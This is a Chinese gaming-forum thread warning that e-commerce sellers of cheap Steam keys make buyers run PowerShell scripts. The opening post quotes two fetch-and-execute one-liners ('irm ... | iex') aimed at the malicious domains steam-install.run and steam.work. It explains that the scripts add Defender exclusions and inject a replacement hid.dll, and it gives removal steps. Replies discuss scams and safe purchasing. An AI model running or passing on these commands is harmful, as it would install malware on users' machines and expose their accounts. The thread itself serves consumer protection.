当心电商平台不法商家 一行指令就可以实现Steam假入库

screeper

从去年11月开始，就不断有人发现在电商购买Steam游戏key的时候，需要运行奇怪的命令
相关文章：
没想到我也能被Steam假正版骗了
世风日下，淘宝 steam 店铺怎么都变成盗号的了？
steam 假激活的玩意分析
分析一个steam假入库行为，附带相关恶意样本
关于 steam.work 激活码诈骗脚本的分析

相关案例：



商家的激活教程中大都需要用PowerShell运行类似这样的命令：

1. irm steam-install.run | iex

复制代码

1. irm steam.work | iex

复制代码

警告：不要在你的电脑上执行这行命令
警告：不要在你的电脑上执行这行命令
警告：不要在你的电脑上执行这行命令

PowerShell的irm是Invoke-Remote-Request的缩写，意思是发起远程请求，基本上就是一个简易HTTP客户端；“|”是管道操作符，会将前一条命令的结果传递给下一条命令；iex是Invoke-Expression的缩写，意思是执行输入的命令。组合起来看的话，就是从一个网址下载其提供的脚本，然后在本地执行，也就是典中典的远程代码执行行为。而网站上托管的脚本随时都会发生更改，所以要插入恶意代码简直是轻而易举的

这些脚本经过了几次迭代，现在的版本一般会干如下几件事：

• 让用户关闭360（如果在运行）
• 把Steam目录添加到Windows Defender的排除列表
• 替换Steam安装目录下的hid.dll文件，实现dll注入
  

如果已经不幸中招，可以参考以下的方法还原干净的Steam：

• 卸载Steam，并手动删除C:\Users\用户名\AppData\Local\SteamActive和C:\Users\用户名\AppData\Local\Steam
• 打开Windows安全中心，病毒和威胁防护→“病毒和威胁防护”设置→管理设置→排除项→添加或删除排除项
  如果有Steam相关字眼的文件夹，就把对应条目删掉
• 重新安装Steam
  

相较于以前让用户下载“激活器”来假入库，这种通过脚本的方案更加隐蔽，也更容易使买家掉以轻心，很容易骗到大量电脑知识不足的小白。

最后，上面提到的steam.work这个域名居然是有备案的，备案主体是企业，估计是拿某个企业信息套皮的。大家可以到网络违法犯罪举报网站 阿里云举报中心 狠狠地举办这些黑产网站，避免更多人受害

森田美位子

反正我在淘宝上举报过几家，人家现在还活得好好的

Tring

https://bbs.saraba1st.com/2b/thread-2187168-1-1.html
都打击过一轮了

寇马可

powershell给小白用实在太危险了，分分钟执行把自己卖掉的操作

screeper

Tring 发表于 2024-7-31 21:41
https://bbs.saraba1st.com/2b/thread-2187168-1-1.html
都打击过一轮了

打击卖家×
打击买家✓
红信是送到买家手上的，等发现自己被vac/号没了的时候往往为时已晚

杨千fa单推人

从来不在淘宝买游戏路过

holomoon

不贪心就不会有风险
什么STEAM假入库、NS游戏兑换码、会员兑换码、低价点卡等等，都是10年甚至20年前的奸商玩剩下的套路了

ChrisSnake

2024年了 办张信用卡很难吗

香草味图书

ChrisSnake 发表于 2024-7-31 23:21
2024年了 办张信用卡很难吗

哪里是信用卡问题，是贪图低价的问题。

—— 来自 HUAWEI HBN-AL00, Android 12上的 S1Next-鹅版 v3.0.0.81-alpha

Tring

screeper 发表于 2024-7-31 22:58
打击卖家×
打击买家✓
红信是送到买家手上的，等发现自己被vac/号没了的时候往往为时已晚 ...

没有买卖就没有杀害。

760194962

ChrisSnake 发表于 2024-7-31 23:21
2024年了 办张信用卡很难吗

未成年玩家多可能？

holomoon

ChrisSnake 发表于 2024-7-31 23:21
2024年了 办张信用卡很难吗

能在电商买Steam游戏key，那得有微信支付宝吧？
恰好Steam购买游戏就直接支持微信支付宝银联来支付
所以不是信用卡问题，就只是单纯贪便宜
要是买DMM点卡GOOGLE点卡玩外服游戏，导致被封还能说自己冤枉

ReginaldMorgan

不太懂powershell，这个steam-install.run 是从哪那的命令，看起来也不像是什么域名

Tring

ReginaldMorgan 发表于 2024-8-1 01:34
不太懂powershell，这个steam-install.run 是从哪那的命令，看起来也不像是什么域名 ...

就是域名，只是现在无效了。
底下那个work的就还能访问。

ReginaldMorgan

Tring 发表于 2024-8-1 01:37
就是域名，只是现在无效了。
底下那个work的就还能访问。

哦，我脑子瓦特了，忘了.run和.work都是域名了

Viteeee

上淘宝买steam游戏，行吧。

半江瑟瑟半江红

Viteeee 发表于 2024-8-1 09:25
上淘宝买steam游戏，行吧。

买可以全球激活的key还行吧
上个月我还买了份失落的星球2

—— 来自 鹅球 v3.1.88-alpha

leafS

steam上一些经常打折的游戏淘宝上有商家低价买入屯的，我之前有几个游戏就是想玩但还没到打折时间就买的淘宝key，只要能正常激活就行了

—— 来自 鹅球 v3.0.86-alpha

qwwsong

最稳的还是礼物，以前淘宝买国区礼物也是真便宜，非史低时期享受史低价。可惜囤礼物被steam砍过了，现在礼物基本逼近原价了

allenz3

现在电脑小白太多了，给了这些js很多机会，老登都是买key自己激活的

Viteeee

半江瑟瑟半江红 发表于 2024-8-1 09:29
买可以全球激活的key还行吧
上个月我还买了份失落的星球2

买key当然没问题啊，杉果和greenman之类的平台卖的也是key，但这种要下什么三方exe的、要运行莫名其妙脚本的、要给远程控制的一看不是就有问题。

我是觉得如果自己没有识别能力、一眼看不出操作方法是否有问题，那就不要贪那个便宜吧。

折中旗帜鲜明

看价格就知道了，明显低价的都是假入库，什么8.8元的博得3、帕鲁等等

viperasi

帕鲁刚火起来的时候B站首页也不知道为啥推了好多免费入库的视频,  标题都是steam打折100%什么的, 点用户发现视频都是类似的东西,举报了几个发现屁用没有.

ahztb

我也在淘宝买过一些游戏
一般就便宜个15%-20%左右直接发key
有些便宜90%以上的就很明显的有问题
甚至见过要你提供账号密码的

雲夢淵澤

这个东西吧，就是个筛查网，和诈骗是一个套路，把脑子正常的人过滤掉，剩下来信的上当概率竟然高达95%

zid99825

Viteeee 发表于 2024-8-1 09:41
买key当然没问题啊，杉果和greenman之类的平台卖的也是key，但这种要下什么三方exe的、要运行莫名其妙脚 ...

怎么说呢，这几年的新玩家因为从小的手机使用，付费观是没问题了，但是几乎都不懂安全防护了

alann

前段时间有好多steam用户跳淘宝弹窗广告就是贪便宜中了招

临界点

看价格都知道真假了

busuji

淘宝纵容的原因。我一直很好奇，这些商家的行为是妥妥的骇客行为了吧，信息安全法也治不了他们吗？就像抓探花视频一样请几家淘宝店主吃公家饭，这事就消停了。

liuqy

qwwsong 发表于 2024-8-1 09:31
最稳的还是礼物，以前淘宝买国区礼物也是真便宜，非史低时期享受史低价。可惜囤礼物被steam砍过了，现在礼 ...

礼物不是会被退款么，有些黑店也不安全

qwased

阿萨辛艾沃尔 发表于 2024-8-1 12:13
没用的，淘宝和这些盗版奸商狼狈为奸，我还记得应该是22年左右，做波西亚时光的工作室联合国内游戏媒体还 ...

卖挂都入刑了，淘宝还不是照样卖
感觉淘宝的监管非常迷

zfz4869

现在能信用卡信用卡了，ns低价区和psn日服还是只能点卡

—— 来自 鹅球 v3.0.85-alpha

qwwsong

liuqy 发表于 2024-8-1 12:18
礼物不是会被退款么，有些黑店也不安全

礼物正常退款需要接收人同意。当然如果刷的黑卡也没用，既然都刷黑卡了那没有任何方法是安全的

aimbot

会这么复杂操作的人也不会去买这种东西吧

llysander

雲夢淵澤 发表于 2024-8-1 10:55
这个东西吧，就是个筛查网，和诈骗是一个套路，把脑子正常的人过滤掉，剩下来信的上当概率竟然高达95% ...

看着针对且仅针对360，若有所思...

MMIno

我刚刚去tb看了一下，发现有些商家卖游戏标价8块钱的，我估计就是这个套路

raimouse

此花开尽更无花 发表于 2024-8-1 12:07
贪便宜吃大亏，好死
这样离谱的价格完全是一眼假啊，为啥不直接要盗版呢？ ...

因为这些玩家不知道哪里下盗版